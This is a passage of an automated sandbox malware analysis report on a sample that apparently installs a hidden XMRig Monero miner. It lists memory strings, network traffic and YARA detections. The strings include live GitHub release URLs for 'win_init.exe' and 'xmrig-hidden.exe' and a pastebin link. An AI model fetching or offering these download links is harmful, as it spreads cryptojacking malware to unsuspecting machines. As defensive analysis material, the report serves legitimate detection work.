                          Source: svchost.exe, 00000012.00000003.1431338492.0000025DCC264000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.1441110879.0000025DCC265000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                          Source: svchost.exe, 00000012.00000002.1441044858.0000025DCC257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1440158956.0000025DCC256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                          Source: svchost.exe, 00000012.00000003.1431958185.0000025DCC259000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1431283067.0000025DCC269000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
                          Source: svchost.exe, 00000012.00000002.1441044858.0000025DCC257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1440158956.0000025DCC256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                          Source: svchost.exe, 00000012.00000003.1431338492.0000025DCC264000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.1440935876.0000025DCC22B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.1441110879.0000025DCC265000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                          Source: svchost.exe, 00000012.00000002.1441044858.0000025DCC257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1440158956.0000025DCC256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                          Source: svchost.exe, 00000012.00000002.1441044858.0000025DCC257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1440158956.0000025DCC256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                          Source: svchost.exe, 00000012.00000002.1441044858.0000025DCC257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1440158956.0000025DCC256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                          Source: svchost.exe, 00000012.00000003.1440062439.0000025DCC240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.1441001888.0000025DCC241000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                          Source: svchost.exe, 00000012.00000002.1441044858.0000025DCC257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1440158956.0000025DCC256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                          Source: svchost.exe, 00000012.00000003.1440062439.0000025DCC240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.1441083689.0000025DCC262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.1441001888.0000025DCC241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1431378159.0000025DCC261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                          Source: svchost.exe, 00000012.00000003.1431378159.0000025DCC261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                          Source: svchost.exe, 00000012.00000002.1441001888.0000025DCC241000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                          Source: svchost.exe, 00000012.00000002.1441083689.0000025DCC262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1431378159.0000025DCC261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                          Source: svchost.exe, 00000012.00000003.1440062439.0000025DCC240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.1441001888.0000025DCC241000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
                          Source: svchost.exe, 00000012.00000002.1441001888.0000025DCC241000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
                          Source: svchost.exe, 00000012.00000002.1441044858.0000025DCC257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1440158956.0000025DCC256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                          Source: svchost.exe, 00000012.00000003.1440062439.0000025DCC240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
                          Source: svchost.exe, 00000012.00000003.1431338492.0000025DCC264000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.1440935876.0000025DCC22B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.1441110879.0000025DCC265000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                          Source: edb.log.13.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                          Source: svchost.exe, 0000000D.00000003.1206128932.000001D639670000.00000004.00000800.00020000.00000000.sdmp, edb.log.13.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                          Source: powershell.exe, 00000005.00000002.1303391671.000001BF25201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1303391671.000001BF24472000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1491070014.0000022387812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1491070014.000002238732C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
                          Source: powershell.exe, 00000009.00000002.1498144988.0000027200222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                          Source: powershell.exe, 00000010.00000002.1487918627.0000022384F30000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1491070014.000002238732C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe
                          Source: win_init.exe, 00000021.00000002.1803688818.000000C000218000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/letzchipman7/fallen/releases/download/v1.0.0/xmrig-hidden.exe
                          Source: esFK2gm.exe, 00000000.00000002.2131272483.000000C0000CA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/letzchipman7/fallen/releases/download/v1.0.0/xmrig-hidden.exeSoftware
                          Source: powershell.exe, 00000005.00000002.1303391671.000001BF25201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1498144988.0000027200DCD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1671666039.0000013148B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                          Source: powershell.exe, 00000005.00000002.1364575138.000001BF34401000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1364575138.000001BF342CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1595093978.00000272101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1498144988.00000272019B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1595093978.000002721007C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                          Source: powershell.exe, 00000005.00000002.1303391671.000001BF25845000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1303391671.000001BF245F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1491070014.0000022387B57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1491070014.0000022387451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com
                          Source: powershell.exe, 00000005.00000002.1303391671.000001BF25845000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1303391671.000001BF245F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1491070014.0000022387B57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1491070014.0000022387451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/941574414/b85117f6-f40e
                          Source: win_init.exe, 0000001E.00000002.1619147975.000000C000138000.00000004.00001000.00020000.00000000.sdmp, win_init.exe, 00000021.00000002.1803688818.000000C00021A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/941574414/ea8c5442-d9b8
                          Source: powershell.exe, 00000005.00000002.1303391671.000001BF25845000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1491070014.0000022387B57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://objects.githubuserconth
                          Source: esFK2gm.exe, 00000000.00000002.2131272483.000000C0001B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/i3kvksAW
                          Source: svchost.exe, 00000012.00000003.1440197993.0000025DCC231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.sshL#
                          Source: svchost.exe, 00000012.00000003.1440197993.0000025DCC231000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.1440958719.0000025DCC235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak
                          Source: svchost.exe, 00000012.00000003.1440197993.0000025DCC231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.til(P#
                          Source: svchost.exe, 00000012.00000003.1440197993.0000025DCC231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.viPF#
                          Source: svchost.exe, 00000012.00000003.1440197993.0000025DCC231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtu
                          Source: svchost.exe, 00000012.00000003.1440062439.0000025DCC240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                          Source: svchost.exe, 00000012.00000003.1440032872.0000025DCC24B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.1441001888.0000025DCC241000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                          Source: svchost.exe, 00000012.00000003.1440032872.0000025DCC24B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.1441001888.0000025DCC241000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                          Source: svchost.exe, 00000012.00000002.1440935876.0000025DCC22B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                          Source: svchost.exe, 00000012.00000003.1440197993.0000025DCC231000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.1440958719.0000025DCC235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/pS#
                          Source: svchost.exe, 00000012.00000003.1440197993.0000025DCC231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.netxK#
                          Source: svchost.exe, 00000012.00000002.1441044858.0000025DCC257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1440158956.0000025DCC256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                          Source: svchost.exe, 00000012.00000002.1441044858.0000025DCC257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1440158956.0000025DCC256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
                          Source: esFK2gm.exe, 00000000.00000002.2136754074.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, esFK2gm.exe, 00000000.00000002.2135744163.000000C000400000.00000004.00001000.00020000.00000000.sdmp, win_init.exe, 0000001E.00000002.1621539104.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, win_init.exe, 00000021.00000002.1805169349.000000C000C00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/benchmark/%s
                          Source: esFK2gm.exe, 00000000.00000002.2136754074.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, esFK2gm.exe, 00000000.00000002.2135744163.000000C000400000.00000004.00001000.00020000.00000000.sdmp, win_init.exe, 0000001E.00000002.1621539104.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, win_init.exe, 00000021.00000002.1805169349.000000C000C00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
                          Source: esFK2gm.exe, 00000000.00000002.2136754074.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, esFK2gm.exe, 00000000.00000002.2135744163.000000C000400000.00000004.00001000.00020000.00000000.sdmp, win_init.exe, 0000001E.00000002.1621539104.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, win_init.exe, 00000021.00000002.1805169349.000000C000C00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/wizard
                          Source: esFK2gm.exe, 00000000.00000002.2136754074.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, esFK2gm.exe, 00000000.00000002.2135744163.000000C000400000.00000004.00001000.00020000.00000000.sdmp, win_init.exe, 0000001E.00000002.1621539104.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, win_init.exe, 00000021.00000002.1805169349.000000C000C00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/wizard%s
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49682
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49681
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49681 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                          Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.7:49690 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.7:49692 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.7:49697 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.7:49700 version: TLS 1.2
                          Source: esFK2gm.exeBinary or memory string: github.com/lxn/win.getRawInputData

                          System Summary

                          barindex
                          Malicious sample detected (through community Yara rule)
                          Source: sslproxydump.pcap, type: PCAPMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                          Source: 0.2.esFK2gm.exe.c000a90000.3.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                          Source: 0.2.esFK2gm.exe.c000a90000.3.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: 0.2.esFK2gm.exe.c000a90000.3.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                          Source: 30.2.win_init.exe.c0009f0000.13.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                          Source: 30.2.win_init.exe.c0009f0000.13.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: 30.2.win_init.exe.c0009f0000.13.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                          Source: 33.2.win_init.exe.c000a8a000.14.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                          Source: 33.2.win_init.exe.c000a8a000.14.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: 33.2.win_init.exe.c000a8a000.14.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                          Source: 00000000.00000002.2135744163.000000C000400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                          Source: 00000000.00000002.2136754074.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                          Source: 00000021.00000002.1805169349.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                          Source: 0000001E.00000002.1621539104.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                          Source: Process Memory Space: esFK2gm.exe PID: 6424, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                          Source: Process Memory Space: win_init.exe PID: 916, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                          Source: Process Memory Space: win_init.exe PID: 6092, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                          Powershell drops PE file
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\win_init.exeJump to dropped file
                          Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFB9AB20C0C9_2_00007FFB9AB20C0C
                          Source: esFK2gm.exeStatic PE information: Number of sections : 15 > 10
                          Source: win_init.exe.5.drStatic PE information: Number of sections : 15 > 10
                          Source: esFK2gm.exe, 00000000.00000002.2136754074.000000C000C00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamexmrig.exe, vs esFK2gm.exe
                          Source: esFK2gm.exe, 00000000.00000002.2131272483.000000C00014A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamexmrig.exe, vs esFK2gm.exe
                          Source: sslproxydump.pcap, type: PCAPMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                          Source: 0.2.esFK2gm.exe.c000a90000.3.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                          Source: 0.2.esFK2gm.exe.c000a90000.3.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: 0.2.esFK2gm.exe.c000a90000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: 30.2.win_init.exe.c0009f0000.13.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                          Source: 30.2.win_init.exe.c0009f0000.13.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: 30.2.win_init.exe.c0009f0000.13.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: 33.2.win_init.exe.c000a8a000.14.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                          Source: 33.2.win_init.exe.c000a8a000.14.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: 33.2.win_init.exe.c000a8a000.14.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: 00000000.00000002.2135744163.000000C000400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                          Source: 00000000.00000002.2136754074.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                          Source: 00000021.00000002.1805169349.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                          Source: 0000001E.00000002.1621539104.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                          Source: Process Memory Space: esFK2gm.exe PID: 6424, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                          Source: Process Memory Space: win_init.exe PID: 916, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                          Source: Process Memory Space: win_init.exe PID: 6092, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                          Source: esFK2gm.exeStatic PE information: Section: /19 ZLIB complexity 0.9994562206725756
                          Source: esFK2gm.exeStatic PE information: Section: /32 ZLIB complexity 0.9961624528894473
                          Source: esFK2gm.exeStatic PE information: Section: /65 ZLIB complexity 0.9993740840254031
                          Source: esFK2gm.exeStatic PE information: Section: /78 ZLIB complexity 0.9914014862804879
                          Source: win_init.exe.5.drStatic PE information: Section: /19 ZLIB complexity 0.9994562206725756
                          Source: win_init.exe.5.drStatic PE information: Section: /32 ZLIB complexity 0.9961624528894473
                          Source: win_init.exe.5.drStatic PE information: Section: /65 ZLIB complexity 0.9993740840254031
